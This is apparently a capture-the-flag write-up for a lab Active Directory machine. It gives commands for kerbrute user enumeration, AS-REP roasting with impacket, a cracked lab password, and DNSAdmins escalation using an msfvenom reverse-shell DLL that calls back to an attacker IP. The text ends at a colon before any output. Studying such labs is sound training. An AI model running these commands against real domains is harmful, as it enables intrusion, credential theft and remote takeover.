⇒ Brute was an medium active directory machine created by “wtfitsaduck” that taught us :
- How to enumerate AD users by kerbruting with a wordlist to identify valid users
- Checking if DONT_REQ_PREAUTH set for the users then kerberoasting.
- Privilege Escalation from DNS Admins Group to Domain Admin.
Enumerating and Kerberoasting
⇒ So we enumerated smb and performed ldapqueries but came up empty handed. So next we decided to run kerbrute with username wordlist (from seclists ) to identify valid users which could have DONT_REQ_PREAUTH set which will allow us to perform kerberoasting using GetNPUsers ( impacket tool )
- Running kerbrute with the following wordlist : https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
./kerbrute_linux_amd64 userenum -d brute.csl –dc 172.31.3.3 names.txt
- Next we will kerberoast accounts that have DONT_REQ_PREAUTH set using impacket tool GetNPUsers and retrieve ASREP which we will crack using john.
python3 GetNPUsers.py -dc-ip 172.31.3.3 brute.csl/ -usersfile users.txt -format hashcat -outputfile test11.txt
- Cracking it using john
tess : Unique1
⇒ So now we have credentials for user tess. We can connect to the machine as user tess using evil-winrm
Privilege Escalation to Root [ Exploiting DNSAdmins Group ]
⇒ We discover that the user tess is a part of DNSAdmins group. We can leverage this to escalate our privileges to the domain admin. This is an fantastic blog on how to exploit it : https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
- First we’ll generate the dll payload using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.80 LPORT=7777 –platform=windows -f dll > enox.dll
- Next we will be importing the plugin to the server
dnscmd.exe /config /serverlevelplugindll C:\Users\Tess\Documents\enox.dll
Now we just have to restart the dns service
sc.exe stop dns
sc.exe start dns
⇒ Then we get an reverse shell as system after the service is restarted and our plugin is executed :